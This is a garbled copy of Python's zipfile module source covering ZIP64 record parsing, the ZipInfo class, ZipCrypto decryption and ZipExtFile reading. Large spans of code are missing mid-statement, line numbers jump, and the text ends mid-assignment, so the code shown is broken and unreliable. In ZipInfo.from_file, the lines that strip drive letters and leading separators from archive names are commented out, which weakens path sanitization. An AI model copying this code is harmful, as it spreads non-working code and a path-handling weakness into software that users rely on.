_CD64_NUMBER_ENTRIES_THIS_DISK = 6 185 | _CD64_NUMBER_ENTRIES_TOTAL = 7 186 | _CD64_DIRECTORY_SIZE = 8 187 | _CD64_OFFSET_START_CENTDIR = 9 188 | 189 | _DD_SIGNATURE = 0x08074b50 190 | 191 | _EXTRA_FIELD_STRUCT = struct.Struct(' 1: 257 | raise BadZipFile("zipfiles that span multiple disks are not supported") 258 | 259 | # Assume no 'zip64 extensible data' 260 | fpin.seek(offset - sizeEndCentDir64Locator - sizeEndCentDir64, 2) 261 | data = fpin.read(sizeEndCentDir64) 262 | if len(data) != sizeEndCentDir64: 263 | return endrec 264 | sig, sz, create_version, read_version, disk_num, disk_dir, \ 265 | dircount, dircount2, dirsize, diroffset = \ 266 | struct.unpack(structEndArchive64, data) 267 | if sig != stringEndArchive64: 268 | return endrec 269 | 270 | # Update the original endrec using data from the ZIP64 record 271 | endrec[_ECD_SIGNATURE] = sig 272 | endrec[_ECD_DISK_NUMBER] = disk_num 273 | endrec[_ECD_DISK_START] = disk_dir 274 | endrec[_ECD_ENTRIES_THIS_DISK] = dircount 275 | endrec[_ECD_ENTRIES_TOTAL] = dircount2 276 | endrec[_ECD_SIZE] = dirsize 277 | endrec[_ECD_OFFSET] = diroffset 278 | return endrec 279 | 280 | 281 | def _EndRecData(fpin): 282 | """Return data from the "End of Central Directory" record, or None. 283 | 284 | The data is a list of the nine items in the ZIP "End of central dir" 285 | record followed by a tenth item, the file seek offset of this record.""" 286 | 287 | # Determine file size 288 | fpin.seek(0, 2) 289 | filesize = fpin.tell() 290 | 291 | # Check to see if this is ZIP file with no archive comment (the 292 | # "end of central directory" structure should be the last item in the 293 | # file if this is the case). 294 | try: 295 | fpin.seek(-sizeEndCentDir, 2) 296 | except OSError: 297 | return None 298 | data = fpin.read() 299 | if (len(data) == sizeEndCentDir and 300 | data[0:4] == stringEndArchive and 301 | data[-2:] == b"\000\000"): 302 | # the signature is correct and there's no comment, unpack structure 303 | endrec = struct.unpack(structEndArchive, data) 304 | endrec=list(endrec) 305 | 306 | # Append a blank comment and record start offset 307 | endrec.append(b"") 308 | endrec.append(filesize - sizeEndCentDir) 309 | 310 | # Try to read the "Zip64 end of central directory" structure 311 | return _EndRecData64(fpin, -sizeEndCentDir, endrec) 312 | 313 | # Either this is not a ZIP file, or it is a ZIP file with an archive 314 | # comment. Search the end of the file for the "end of central directory" 315 | # record signature. The comment is the last item in the ZIP file and may be 316 | # up to 64K long. It is assumed that the "end of central directory" magic 317 | # number does not appear in the comment. 318 | maxCommentStart = max(filesize - (1 << 16) - sizeEndCentDir, 0) 319 | fpin.seek(maxCommentStart, 0) 320 | data = fpin.read() 321 | start = data.rfind(stringEndArchive) 322 | if start >= 0: 323 | # found the magic number; attempt to unpack and interpret 324 | recData = data[start:start+sizeEndCentDir] 325 | if len(recData) != sizeEndCentDir: 326 | # Zip file is corrupted. 327 | return None 328 | endrec = list(struct.unpack(structEndArchive, recData)) 329 | commentSize = endrec[_ECD_COMMENT_SIZE] #as claimed by the zip file 330 | comment = data[start+sizeEndCentDir:start+sizeEndCentDir+commentSize] 331 | endrec.append(comment) 332 | endrec.append(maxCommentStart + start) 333 | 334 | # Try to read the "Zip64 end of central directory" structure 335 | return _EndRecData64(fpin, maxCommentStart + start - filesize, 336 | endrec) 337 | 338 | # Unable to find a valid end of central directory structure 339 | return None 340 | 341 | def _sanitize_filename(filename): 342 | """Terminate the file name at the first null byte and 343 | ensure paths always use forward slashes as the directory separator.""" 344 | 345 | # Terminate the file name at the first null byte. Null bytes in file 346 | # names are used as tricks by viruses in archives. 347 | null_byte = filename.find(chr(0)) 348 | if null_byte >= 0: 349 | filename = filename[0:null_byte] 350 | # This is used to ensure paths in generated ZIP files always use 351 | # forward slashes as the directory separator, as required by the 352 | # ZIP format specification. 353 | if os.sep != "/" and os.sep in filename: 354 | filename = filename.replace(os.sep, "/") 355 | return filename 356 | 357 | 358 | class ZipInfo (object): 359 | """Class with attributes describing each file in the ZIP archive.""" 360 | 361 | __slots__ = ( 362 | 'orig_filename', 363 | 'filename', 364 | 'date_time', 365 | 'compress_type', 366 | '_compresslevel', 367 | 'comment', 368 | 'extra', 369 | 'create_system', 370 | 'create_version', 371 | 'extract_version', 372 | 'reserved', 373 | 'flag_bits', 374 | 'volume', 375 | 'internal_attr', 376 | 'external_attr', 377 | 'header_offset', 378 | 'CRC', 379 | 'compress_size', 380 | 'file_size', 381 | '_raw_time', 382 | ) 383 | 384 | def __init__(self, filename="NoName", date_time=(1980,1,1,0,0,0)): 385 | self.orig_filename = filename # Original file name in archive 386 | 387 | # Terminate the file name at the first null byte and 388 | # ensure paths always use forward slashes as the directory separator. 389 | filename = _sanitize_filename(filename) 390 | 391 | self.filename = filename # Normalized file name 392 | self.date_time = date_time # year, month, day, hour, min, sec 393 | 394 | if date_time[0] < 1980: 395 | raise ValueError('ZIP does not support timestamps before 1980') 396 | 397 | # Standard values: 398 | self.compress_type = ZIP_STORED # Type of compression for the file 399 | self._compresslevel = None # Level for the compressor 400 | self.comment = b"" # Comment for each file 401 | self.extra = b"" # ZIP extra data 402 | if sys.platform == 'win32': 403 | self.create_system = 0 # System which created ZIP archive 404 | else: 405 | # Assume everything else is unix-y 406 | self.create_system = 3 # System which created ZIP archive 407 | self.create_version = DEFAULT_VERSION # Version which created ZIP archive 408 | self.extract_version = DEFAULT_VERSION # Version needed to extract archive 409 | self.reserved = 0 # Must be zero 410 | self.flag_bits = 0 # ZIP flag bits 411 | self.volume = 0 # Volume number of file header 412 | self.internal_attr = 0 # Internal attributes 413 | self.external_attr = 0 # External file attributes 414 | self.compress_size = 0 # Size of the compressed file 415 | self.file_size = 0 # Size of the uncompressed file 416 | # Other attributes are set by class ZipFile: 417 | # header_offset Byte offset to the file header 418 | # CRC CRC-32 of the uncompressed file 419 | 420 | def __repr__(self): 421 | result = ['<%s filename=%r' % (self.__class__.__name__, self.filename)] 422 | if self.compress_type != ZIP_STORED: 423 | result.append(' compress_type=%s' % 424 | compressor_names.get(self.compress_type, 425 | self.compress_type)) 426 | hi = self.external_attr >> 16 427 | lo = self.external_attr & 0xFFFF 428 | if hi: 429 | result.append(' filemode=%r' % stat.filemode(hi)) 430 | if lo: 431 | result.append(' external_attr=%#x' % lo) 432 | isdir = self.is_dir() 433 | if not isdir or self.file_size: 434 | result.append(' file_size=%r' % self.file_size) 435 | if ((not isdir or self.compress_size) and 436 | (self.compress_type != ZIP_STORED or 437 | self.file_size != self.compress_size)): 438 | result.append(' compress_size=%r' % self.compress_size) 439 | result.append('>') 440 | return ''.join(result) 441 | 442 | def FileHeader(self, zip64=None): 443 | """Return the per-file header as a bytes object.""" 444 | dt = self.date_time 445 | dosdate = (dt[0] - 1980) << 9 | dt[1] << 5 | dt[2] 446 | dostime = dt[3] << 11 | dt[4] << 5 | (dt[5] // 2) 447 | if self.flag_bits & _MASK_USE_DATA_DESCRIPTOR: 448 | # Set these to zero because we write them after the file data 449 | CRC = compress_size = file_size = 0 450 | else: 451 | CRC = self.CRC 452 | compress_size = self.compress_size 453 | file_size = self.file_size 454 | 455 | extra = self.extra 456 | 457 | min_version = 0 458 | if zip64 is None: 459 | zip64 = file_size > ZIP64_LIMIT or compress_size > ZIP64_LIMIT 460 | if zip64: 461 | fmt = ' ZIP64_LIMIT or compress_size > ZIP64_LIMIT: 465 | if not zip64: 466 | raise LargeZipFile("Filesize would require ZIP64 extensions") 467 | # File is larger than what fits into a 4 byte integer, 468 | # fall back to the ZIP64 extension 469 | file_size = 0xffffffff 470 | compress_size = 0xffffffff 471 | min_version = ZIP64_VERSION 472 | 473 | if self.compress_type == ZIP_BZIP2: 474 | min_version = max(BZIP2_VERSION, min_version) 475 | elif self.compress_type == ZIP_LZMA: 476 | min_version = max(LZMA_VERSION, min_version) 477 | 478 | self.extract_version = max(min_version, self.extract_version) 479 | self.create_version = max(min_version, self.create_version) 480 | filename, flag_bits = self._encodeFilenameFlags() 481 | header = struct.pack(structFileHeader, stringFileHeader, 482 | self.extract_version, self.reserved, flag_bits, 483 | self.compress_type, dostime, dosdate, CRC, 484 | compress_size, file_size, 485 | len(filename), len(extra)) 486 | return header + filename + extra 487 | 488 | def _encodeFilenameFlags(self): 489 | try: 490 | return self.filename.encode('ascii'), self.flag_bits 491 | except UnicodeEncodeError: 492 | return self.filename.encode('utf-8'), self.flag_bits | _MASK_UTF_FILENAME 493 | 494 | def _decodeExtra(self, filename_crc): 495 | # Try to decode the extra field. 496 | extra = self.extra 497 | unpack = struct.unpack 498 | while len(extra) >= 4: 499 | tp, ln = unpack(' len(extra): 501 | raise BadZipFile("Corrupt extra field %04x (size=%d)" % (tp, ln)) 502 | if tp == 0x0001: 503 | data = extra[4:ln+4] 504 | # ZIP64 extension (large files and/or large archives) 505 | try: 506 | if self.file_size in (0xFFFF_FFFF_FFFF_FFFF, 0xFFFF_FFFF): 507 | field = "File size" 508 | self.file_size, = unpack(' 2107: 557 | date_time = (2107, 12, 31, 23, 59, 59) 558 | # Create ZipInfo instance to store file information 559 | if arcname is None: 560 | arcname = filename 561 | #arcname = os.path.normpath(os.path.splitdrive(arcname)[1]) 562 | #while arcname[0] in (os.sep, os.altsep): 563 | # arcname = arcname[1:] 564 | if isdir: 565 | arcname += '/' 566 | zinfo = cls(arcname, date_time) 567 | zinfo.external_attr = (st.st_mode & 0xFFFF) << 16 # Unix attributes 568 | if isdir: 569 | zinfo.file_size = 0 570 | zinfo.external_attr |= 0x10 # MS-DOS directory flag 571 | else: 572 | zinfo.file_size = st.st_size 573 | 574 | return zinfo 575 | 576 | def is_dir(self): 577 | """Return True if this archive member is a directory.""" 578 | return self.filename.endswith('/') 579 | 580 | 581 | # ZIP encryption uses the CRC32 one-byte primitive for scrambling some 582 | # internal keys. We noticed that a direct implementation is faster than 583 | # relying on binascii.crc32(). 584 | 585 | _crctable = None 586 | def _gen_crc(crc): 587 | for j in range(8): 588 | if crc & 1: 589 | crc = (crc >> 1) ^ 0xEDB88320 590 | else: 591 | crc >>= 1 592 | return crc 593 | 594 | # ZIP supports a password-based form of encryption. Even though known 595 | # plaintext attacks have been found against it, it is still useful 596 | # to be able to get data out of such a file. 597 | # 598 | # Usage: 599 | # zd = _ZipDecrypter(mypwd) 600 | # plain_bytes = zd(cypher_bytes) 601 | 602 | def _ZipDecrypter(pwd): 603 | key0 = 305419896 604 | key1 = 591751049 605 | key2 = 878082192 606 | 607 | global _crctable 608 | if _crctable is None: 609 | _crctable = list(map(_gen_crc, range(256))) 610 | crctable = _crctable 611 | 612 | def crc32(ch, crc): 613 | """Compute the CRC32 primitive on one byte.""" 614 | return (crc >> 8) ^ crctable[(crc ^ ch) & 0xFF] 615 | 616 | def update_keys(c): 617 | nonlocal key0, key1, key2 618 | key0 = crc32(c, key0) 619 | key1 = (key1 + (key0 & 0xFF)) & 0xFFFFFFFF 620 | key1 = (key1 * 134775813 + 1) & 0xFFFFFFFF 621 | key2 = crc32(key1 >> 24, key2) 622 | 623 | for p in pwd: 624 | update_keys(p) 625 | 626 | def decrypter(data): 627 | """Decrypt a bytes object.""" 628 | result = bytearray() 629 | append = result.append 630 | for c in data: 631 | k = key2 | 2 632 | c ^= ((k * (k^1)) >> 8) & 0xFF 633 | update_keys(c) 634 | append(c) 635 | return bytes(result) 636 | 637 | return decrypter 638 | 639 | 640 | class LZMACompressor: 641 | 642 | def __init__(self): 643 | self._comp = None 644 | 645 | def _init(self): 646 | props = lzma._encode_filter_properties({'id': lzma.FILTER_LZMA1}) 647 | self._comp = lzma.LZMACompressor(lzma.FORMAT_RAW, filters=[ 648 | lzma._decode_filter_properties(lzma.FILTER_LZMA1, props) 649 | ]) 650 | return struct.pack('> 8) & 0xff 882 | else: 883 | # compare against the CRC otherwise 884 | check_byte = (zipinfo.CRC >> 24) & 0xff 885 | h = self._init_decrypter() 886 | if h != check_byte: 887 | raise RuntimeError("Bad password for file %r" % zipinfo.orig_filename) 888 | 889 | 890 | def _init_decrypter(self): 891 | self._decrypter = _ZipDecrypter(self._pwd) 892 | # The first 12 bytes in the cypher stream is an encryption header 893 | # used to strengthen the algorithm. The first 11 bytes are 894 | # completely random, while the 12th contains the MSB of the CRC, 895 | # or the MSB of the file time depending on the header type 896 | # and is used to check the correctness of the password. 897 | header = self._fileobj.read(12) 898 | self._compress_left -= 12 899 | return self._decrypter(header)[11] 900 | 901 | def __repr__(self): 902 | result = ['<%s.%s' % (self.__class__.__module__, 903 | self.__class__.__qualname__)] 904 | if not self.closed: 905 | result.append(' name=%r mode=%r' % (self.name, self.mode)) 906 | if self._compress_type != ZIP_STORED: 907 | result.append(' compress_type=%s' % 908 | compressor_names.get(self._compress_type, 909 | self._compress_type)) 910 | else: 911 | result.append(' [closed]') 912 | result.append('>') 913 | return ''.join(result) 914 | 915 | def readline(self, limit=-1): 916 | """Read and return a line from the stream. 917 | 918 | If limit is specified, at most limit bytes will be read. 919 | """ 920 | 921 | if limit < 0: 922 | # Shortcut common case - newline found in buffer. 923 | i = self._readbuffer.find(b'\n', self._offset) + 1 924 | if i > 0: 925 | line = self._readbuffer[self._offset: i] 926 | self._offset = i 927 | return line 928 | 929 | return io.BufferedIOBase.readline(self, limit) 930 | 931 | def peek(self, n=1): 932 | """Returns buffered bytes without advancing the position.""" 933 | if n > len(self._readbuffer) - self._offset: 934 | chunk = self.read(n) 935 | if len(chunk) > self._offset: 936 | self._readbuffer = chunk + self._readbuffer[self._offset:] 937 | self._offset = 0 938 | else: 939 | self._offset -= len(chunk) 940 | 941 | # Return up to 512 bytes to reduce allocation overhead for tight loops. 942 | return self._readbuffer[self._offset: self._offset + 512] 943 | 944 | def readable(self): 945 | if self.closed: 946 | raise ValueError("I/O operation on closed file.") 947 | return True 948 | 949 | def read(self, n=-1): 950 | """Read and return up to n bytes. 951 | If the argument is omitted, None, or negative, data is read and returned until EOF is reached. 952 | """ 953 | if self.closed: 954 | raise ValueError("read from closed file.") 955 | if n is None or n < 0: 956 | buf = self._readbuffer[self._offset:] 957 | self._readbuffer = b'' 958 | self._offset = 0 959 | while not self._eof: 960 | buf += self._read1(self.MAX_N) 961 | return buf 962 | 963 | end = n + self._offset 964 | if end < len(self._readbuffer): 965 | buf = self._readbuffer[self._offset:end] 966 | self._offset = end 967 | return buf 968 | 969 | n = end - len(self._readbuffer) 970 | buf = self._readbuffer[self._offset:] 971 | self._readbuffer = b'' 972 | self._offset = 0 973 | while n > 0 and not self._eof: 974 | data = self._read1(n) 975 | if n < len(data): 976 | self._readbuffer = data 977 | self._offset = n 978 | buf += data[:n] 979 | break 980 | buf += data 981 | n -= len(data) 982 | return buf 983 | 984 | def _update_crc(self, newdata): 985 | # Update the CRC using the given data. 986 | if self._expected_crc is None: 987 | # No need to compute the CRC if we don't have a reference value 988 | return 989 | self._running_crc = crc32(newdata, self._running_crc) 990 | # Check the CRC if we're at the end of the file 991 | if self._eof and self._running_crc != self._expected_crc: 992 | raise BadZipFile("Bad CRC-32 for file %r" % self.name) 993 | 994 | def read1(self, n): 995 | """Read up to n bytes with at most one read() system call.""" 996 | 997 | if n is None or n < 0: 998 | buf = self._readbuffer[self._offset:] 999 | self._readbuffer = b'' 1000 | self._offset = 0 1001 | while not self._eof: 1002 | data = self._read1(self.MAX_N) 1003 | if data: 1004 | buf += data 1005 | break 1006 | return buf 1007 | 1008 | end = n + self._offset 1009 | if end < len(self._readbuffer): 1010 | buf = self._readbuffer[self._offset:end] 1011 | self._offset = end 1012 | return buf 1013 | 1014 | n = end - len(self._readbuffer) 1015 | buf = self._readbuffer[self._offset:] 1016 | self._readbuffer = b'' 1017 | self._offset = 0 1018 | if n > 0: 1019 | while not self._eof: 1020 | data = self._read1(n) 1021 | if n < len(data): 1022 | self._readbuffer = data 1023 | self._offset = n 1024 | buf += data[:n] 1025 | break 1026 | if data: 1027 | buf += data 1028 | break 1029 | return buf 1030 | 1031 | def _read1(self, n): 1032 | # Read up to n compressed bytes with at most one read() system call, 1033 | # decrypt and decompress them. 1034 | if self._eof or n <= 0: 1035 | return b'' 1036 | 1037 | # Read from file. 1038 | if self._compress_type == ZIP_DEFLATED: 1039 | ## Handle unconsumed data. 1040 | data = self._decompressor.unconsumed_tail 1041 | if n > len(data): 1042 | data += self._read2(n - len(data)) 1043 | else: 1044 | data = self._read2(n) 1045 | 1046 | if self._compress_type == ZIP_STORED: 1047 | self._eof = self._compress_left <= 0 1048 | elif self._compress_type == ZIP_DEFLATED: 1049 | n = max(n, self.MIN_READ_SIZE) 1050 | data = self._decompressor.decompress(data, n) 1051 | self._eof = (self._decompressor.eof or 1052 | self._compress_left <= 0 and 1053 | not self._decompressor.unconsumed_tail) 1054 | if self._eof: 1055 | data += self._decompressor.flush() 1056 | else: 1057 | data = self._decompressor.decompress(data) 1058 | self._eof = self._decompressor.eof or self._compress_left <= 0 1059 | 1060 | data = data[:self._left] 1061 | self._left -= len(data) 1062 | if self._left <= 0: 1063 | self._eof = True 1064 | self._update_crc(data) 1065 | return data 1066 | 1067 | def _read2(self, n): 1068 | if self._compress_left <= 0: 1069 | return b'' 1070 | 1071 | n = max(n, self.MIN_READ_SIZE) 1072 | n = min(n, self._compress_left) 1073 | 1074 | data = self._fileobj.read(n) 1075 | self._compress_left -= len(data) 1076 | if not data: 1077 | raise EOFError 1078 | 1079 | if self._decrypter is not None: 1080 | data = self._decrypter(data) 1081 | return data 1082 | 1083 | def close(self): 1084 | try: 1085 | if self._close_fileobj: 1086 | self._fileobj.close() 1087 | finally: 1088 | super().close() 1089 | 1090 | def seekable(self): 1091 | if self.closed: 1092 | raise ValueError("I/O operation on closed file.") 1093 | return self._seekable 1094 | 1095 | def seek(self, offset, whence=os.SEEK_SET): 1096 | if self.closed: 1097 | raise ValueError("seek on closed file.") 1098 | if not self._seekable: 1099 | raise io.UnsupportedOperation("underlying stream is not seekable") 1100 | curr_pos = self.tell() 1101 | if whence == os.SEEK_SET: 1102 | new_pos = offset 1103 | elif whence == os.SEEK_CUR: 1104 | new_pos = curr_pos + offset 1105 | elif whence == os.SEEK_END: 1106 | new_pos = self._orig_file_size + offset 1107 | else: 1108 | raise ValueError("whence must be os.SEEK_SET (0), " 1109 | "os.SEEK_CUR (1), or os.SEEK_END (2)") 1110 | 1111 | if new_pos > self._orig_file_size: 1112 | new_pos = self._orig_file_size 1113 | 1114 | if new_pos < 0: 1115 | new_pos = 0 1116 | 1117 | read_offset = new_pos - curr_pos 1118 | buff_offset = read_offset + self._offset 1119 | 1120 | # Fast seek uncompressed unencrypted file 1121 | if self._compress_type == ZIP_STORED and self._decrypter is None and read_offset > 0: 1122 | # disable CRC checking after first seeking - it would be invalid 1123 | self._expected_crc = None 1124 | # seek actual file taking already buffered data into account 1125 | read_offset -= len(self._readbuffer) - self._offset 1126 | self._fileobj.seek(read_offset, os.SEEK_CUR) 1127 | self._left -= read_offset 1128 | read_offset = 0 1129 | # flush read buffer 1130 | self._readbuffer = b'' 1131 | self._offset = 0 1132 | elif buff_offset >= 0 and buff_offset < len(self._readbuffer): 1133 | # Just move the _offset index if the new position is in the _readbuffer 1134 | self._offset = buff_offset 1135 | read_offset = 0 1136 | elif read_offset < 0: 1137 | # Position is before the current position. Reset the ZipExtFile 1138 | self._fileobj.seek(self._orig_compress_start) 1139 | self._running_crc = self._orig_start_crc 1140 | self._expected_crc = self._orig_crc 1141 | self._compress_left = self._orig_compress_size 1142 | self._left = self._orig_file_size 1143 | self._readbuffer = b'' 1144 | self._offset = 0 1145 | self._decompressor = _get_decompressor(self._compress_type) 1146 | self._eof = False 1147 | read_offset = new_pos 1148 | if self._decrypter is not None: 1149 | self._init_decrypter() 1150 | 1151 | while read_offset > 0: 1152 | read_len = min(self.MAX_SEEK_READ, read_offset) 1153 | self.read(read_len) 1154 | read_offset -= read_len 1155 | 1156 | return self.tell() 1157 | 1158 | def tell(self): 1159 | if self.closed: 1160 | raise ValueError("tell on closed file.") 1161 | if not self._seekable: 1162 | raise io.UnsupportedOperation("underlying stream is not seekable") 1163 | filepos = self._orig_file_size - self._left - len(self._readbuffer) + self._offset 1164 | return filepos 1165 | 1166 | 1167 | class _ZipWriteFile(io.BufferedIOBase): 1168 | def __init__(self, zf, zinfo, zip64): 1169 | self._zinfo = zinfo 1170 | self._zip64 = zip64 1171 | self._zipfile = zf 1172 | self._compressor = _get_compressor(zinfo.compress_type, 1173 | zinfo._compresslevel) 1174 | self._file_size = 0 1175 | self._compress_size = 0 1176 | self._crc = 0 1177 | 1178 | @property 1179 | def _fileobj(self): 1180 | return self._zipfile.fp 1181 | 1182 | def writable(self): 1183 | return True 1184 | 1185 | def write(self, data): 1186 | if self.closed: 1187 | raise ValueError('I/O operation on closed file.') 1188 | 1189 | # Accept any data that supports the buffer protocol 1190 | if isinstance(data, (bytes, bytearray)): 1191 | nbytes = len(data) 1192 | else: 1193 | data = memoryview(data) 1194 | nbytes = data.nbytes 1195 | self._file_size += nbytes 1196 | 1197 | self._crc = crc32(data, self._crc) 1198 | if self._compressor: 1199 | data = self._compressor.compress(data) 1200 | self._compress_size += len(data) 1201 | self._fileobj.write(data) 1202 | return nbytes 1203 | 1204 | def close(self): 1205 | if self.closed: 1206 | return 1207 | try: 1208 | super().close() 1209 | # Flush any data from the compressor, and update header info 1210 | if self._compressor: 1211 | buf = self._compressor.flush() 1212 | self._compress_size += len(buf) 1213 | self._fileobj.write(buf) 1214 | self._zinfo.compress_size = self._compress_size 1215 | else: 1216 | self._zinfo.compress_size = self._file_size 1217 | self._zinfo.CRC = self._crc 1218 | self._zinfo.file_size = self._file_size 1219 | 1220 | # Write updated header info 1221 | if self._zinfo.flag_bits & _MASK_USE_DATA_DESCRIPTOR: 1222 | # Write CRC and file sizes after the file data 1223 | fmt = ' ZIP64_LIMIT: 1230 | raise RuntimeError( 1231 | 'File size too large, try using force_zip64') 1232 | if self._compress_size > ZIP64_LIMIT: 1233 | raise RuntimeError( 1234 | 'Compressed size too large, try using force_zip64') 1235 | # Seek backwards and write file header (which will now include 1236 | # correct CRC and file sizes) 1237 | 1238 | # Preserve current position in file 1239 | self._zipfile.start_dir = self._fileobj.tell() 1240 | self._fileobj.seek(self._zinfo.header_offset) 1241 | self._fileobj.write(self._zinfo.FileHeader(self._zip64)) 1242 | self._fileobj.seek(self._zipfile.start_dir) 1243 | 1244 | # Successfully written: Add file to our caches 1245 | self._zipfile.filelist.append(self._zinfo) 1246 | self._zipfile.NameToInfo[self._zinfo.filename] = self._zinfo 1247 | finally: 1248 | self._zipfile._writing = False 1249 | 1250 | 1251 | 1252 | class ZipFile: 1253 | """ Class with methods to open, read, write, close, list zip files. 1254 | 1255 | z = ZipFile(file, mode="r", compression=ZIP_STORED, allowZip64=True, 1256 | compresslevel=None) 1257 | 1258 | file: Either the path to the file, or a file-like object. 1259 | If it is a path, the file will be opened and closed by ZipFile. 1260 | mode: The mode can be either read 'r', write 'w', exclusive create 'x', 1261 | or append 'a'. 1262 | compression: ZIP_STORED (no compression), ZIP_DEFLATED (requires zlib), 1263 | ZIP_BZIP2 (requires bz2) or ZIP_LZMA (requires lzma). 1264 | allowZip64: if True ZipFile will create files with ZIP64 extensions when 1265 | needed, otherwise it will raise an exception when this would 1266 | be necessary. 1267 | compresslevel: None (default for the given compression type) or an integer 1268 | specifying the level to pass to the compressor. 1269 | When using ZIP_STORED or ZIP_LZMA this keyword has no effect. 1270 | When using ZIP_DEFLATED integers 0 through 9 are accepted. 1271 | When using ZIP_BZIP2 integers 1 through 9 are accepted. 1272 | 1273 | """ 1274 | 1275 | fp = None # Set here since __del__ checks it 1276 | _windows_illegal_name_trans_table = None 1277 | 1278 | def __init__(self, file, mode="r", compression=ZIP_STORED, allowZip64=True, 1279 | compresslevel=None, *, strict_timestamps=True, metadata_encoding=None): 1280 | """Open the ZIP file with mode read 'r', write 'w', exclusive create 'x', 1281 | or append 'a'.""" 1282 | if mode not in ('r', 'w', 'x', 'a'): 1283 | raise ValueError("ZipFile requires mode 'r', 'w', 'x', or 'a'") 1284 | 1285 | _check_compression(compression) 1286 | 1287 | self._allowZip64 = allowZip64 1288 | self._didModify = False 1289 | self.debug = 0 # Level of printing: 0 through 3 1290 | self.NameToInfo = {} # Find file info given name 1291 | self.filelist = [] # List of ZipInfo instances for archive 1292 | self.compression = compression # Method of compression 1293 | self.compresslevel = compresslevel 1294 | self.mode = mode 1295 | self.pwd = None 1296 | self._comment = b'' 1297 | self._strict_timestamps = strict_timestamps 1298 | self.metadata_encoding = metadata_encoding 1299 | 1300 | # Check that we don't try to write with nonconforming codecs 1301 | if self.metadata_encoding and mode != 'r': 1302 | raise ValueError( 1303 | "metadata_encoding is only supported for reading files") 1304 | 1305 | # Check if we were passed a file-like object 1306 | if isinstance(file, os.PathLike): 1307 | file = os.fspath(file) 1308 | if isinstance(file, str): 1309 | # No, it's a filename 1310 | self._filePassed = 0 1311 | self.filename = file 1312 | modeDict = {'r' : 'rb', 'w': 'w+b', 'x': 'x+b', 'a' : 'r+b', 1313 | 'r+b': 'w+b', 'w+b': 'wb', 'x+b': 'xb'} 1314 | filemode = modeDict[mode] 1315 | while True: 1316 | try: 1317 | self.fp = io.open(file, filemode) 1318 | except OSError: 1319 | if filemode in modeDict: 1320 | filemode = modeDict[filemode] 1321 | continue 1322 | raise 1323 | break 1324 | else: 1325 | self._filePassed = 1 1326 | self.fp = file 1327 | self.filename = getattr(file, 'name', None) 1328 | self._fileRefCnt = 1 1329 | self._lock = threading.RLock() 1330 | self._seekable = True 1331 | self._writing = False 1332 | 1333 | try: 1334 | if mode == 'r': 1335 | self._RealGetContents() 1336 | elif mode in ('w', 'x'): 1337 | # set the modified flag so central directory gets written 1338 | # even if no files are added to the archive 1339 | self._didModify = True 1340 | try: 1341 | self.start_dir = self.fp.tell() 1342 | except (AttributeError, OSError): 1343 | self.fp = _Tellable(self.fp) 1344 | self.start_dir = 0 1345 | self._seekable = False 1346 | else: 1347 | # Some file-like objects can provide tell() but not seek() 1348 | try: 1349 | self.fp.seek(self.start_dir) 1350 | except (AttributeError, OSError): 1351 | self._seekable = False 1352 | elif mode == 'a': 1353 | try: 1354 | # See if file is a zip file 1355 | self._RealGetContents() 1356 | # seek to start of directory and overwrite 1357 | self.fp.seek(self.start_dir) 1358 | except BadZipFile: 1359 | # file is not a zip file, just append 1360 | self.fp.seek(0, 2) 1361 | 1362 | # set the modified flag so central directory gets written 1363 | # even if no files are added to the archive 1364 | self._didModify = True 1365 | self.start_dir = self.fp.tell() 1366 | else: 1367 | raise ValueError("Mode must be 'r', 'w', 'x', or 'a'") 1368 | except: 1369 | fp = self.fp 1370 | self.fp = None 1371 | self._fpclose(fp) 1372 | raise 1373 | 1374 | def __enter__(self): 1375 | return self 1376 | 1377 | def __exit__(self, type, value, traceback): 1378 | self.close() 1379 | 1380 | def __repr__(self): 1381 | result = ['<%s.%s' % (self.__class__.__module__, 1382 | self.__class__.__qualname__)] 1383 | if self.fp is not None: 1384 | if self._filePassed: 1385 | result.append(' file=%r' % self.fp) 1386 | elif self.filename is not None: 1387 | result.append(' filename=%r' % self.filename) 1388 | result.append(' mode=%r' % self.mode) 1389 | else: 1390 | result.append(' [closed]') 1391 | result.append('>') 1392 | return ''.join(result) 1393 | 1394 | def _RealGetContents(self): 1395 | """Read in the table of contents for the ZIP file.""" 1396 | fp = self.fp 1397 | try: 1398 | endrec = _EndRecData(fp) 1399 | except OSError: 1400 | raise BadZipFile("File is not a zip file") 1401 | if not endrec: 1402 | raise BadZipFile("File is not a zip file") 1403 | if self.debug > 1: 1404 | print(endrec) 1405 | size_cd = endrec[_ECD_SIZE] # bytes in central directory 1406 | offset_cd = endrec[_ECD_OFFSET] # offset of central directory 1407 | self._comment = endrec[_ECD_COMMENT] # archive comment 1408 | 1409 | # "concat" is zero, unless zip was concatenated to another file 1410 | concat = endrec[_ECD_LOCATION] - size_cd - offset_cd 1411 | if endrec[_ECD_SIGNATURE] == stringEndArchive64: 1412 | # If Zip64 extension structures are present, account for them 1413 | concat -= (sizeEndCentDir64 + sizeEndCentDir64Locator) 1414 | 1415 | if self.debug > 2: 1416 | inferred = concat + offset_cd 1417 | print("given, inferred, offset", offset_cd, inferred, concat) 1418 | # self.start_dir: Position of start of central directory 1419 | self.start_dir = offset_cd + concat 1420 | if self.start_dir < 0: 1421 | raise BadZipFile("Bad offset for central directory") 1422 | fp.seek(self.start_dir, 0) 1423 | data = fp.read(size_cd) 1424 | fp = io.BytesIO(data) 1425 | total = 0 1426 | while total < size_cd: 1427 | centdir = fp.read(sizeCentralDir) 1428 | if len(centdir) != sizeCentralDir: 1429 | raise BadZipFile("Truncated central directory") 1430 | centdir = struct.unpack(structCentralDir, centdir) 1431 | if centdir[_CD_SIGNATURE] != stringCentralDir: 1432 | raise BadZipFile("Bad magic number for central directory") 1433 | if self.debug > 2: 1434 | print(centdir) 1435 | filename = fp.read(centdir[_CD_FILENAME_LENGTH]) 1436 | orig_filename_crc = crc32(filename) 1437 | flags = centdir[_CD_FLAG_BITS] 1438 | if flags & _MASK_UTF_FILENAME: 1439 | # UTF-8 file names extension 1440 | filename = filename.decode('utf-8') 1441 | else: 1442 | # Historical ZIP filename encoding 1443 | filename = filename.decode(self.metadata_encoding or 'cp437') 1444 | # Create ZipInfo instance to store file information 1445 | x = ZipInfo(filename) 1446 | x.extra = fp.read(centdir[_CD_EXTRA_FIELD_LENGTH]) 1447 | x.comment = fp.read(centdir[_CD_COMMENT_LENGTH]) 1448 | x.header_offset = centdir[_CD_LOCAL_HEADER_OFFSET] 1449 | (x.create_version, x.create_system, x.extract_version, x.reserved, 1450 | x.flag_bits, x.compress_type, t, d, 1451 | x.CRC, x.compress_size, x.file_size) = centdir[1:12] 1452 | if 